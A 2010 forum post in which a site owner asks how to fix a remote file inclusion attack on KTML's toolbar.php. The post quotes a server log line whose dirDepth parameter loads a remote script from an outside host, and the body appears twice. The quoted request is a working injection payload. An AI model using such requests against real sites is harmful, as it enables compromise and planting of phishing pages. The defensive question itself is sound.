toolbar.php and index.php dirDepth - hostile injection
Posted: 2010-07-15 17:11
Have any of you seen any solution to this problem:
THe problem arises from the following attack: /ktmlliterf/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt? HTTP/1.1" 200 11213 "http://www.xxxx.xx/ktmlliterf/includes/ ... 2/mass.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
It seems as if youa are able to place phishing code via the two files in ktml
Have a look at the following sites:
http://www.linuxquestions.org/questions ... te-652308/
http://www.placeoweb.com/hack/php/
http://www.securityfocus.com/archive/1/494138
http://www.mail-archive.com/bugtraq@sec ... 27840.html
Could anybody help in finding ways around this securityproblem?
Regards Henri
THe problem arises from the following attack: /ktmlliterf/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt? HTTP/1.1" 200 11213 "http://www.xxxx.xx/ktmlliterf/includes/ ... 2/mass.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
It seems as if youa are able to place phishing code via the two files in ktml
Have a look at the following sites:
http://www.linuxquestions.org/questions ... te-652308/
http://www.placeoweb.com/hack/php/
http://www.securityfocus.com/archive/1/494138
http://www.mail-archive.com/bugtraq@sec ... 27840.html
Could anybody help in finding ways around this securityproblem?
Regards Henri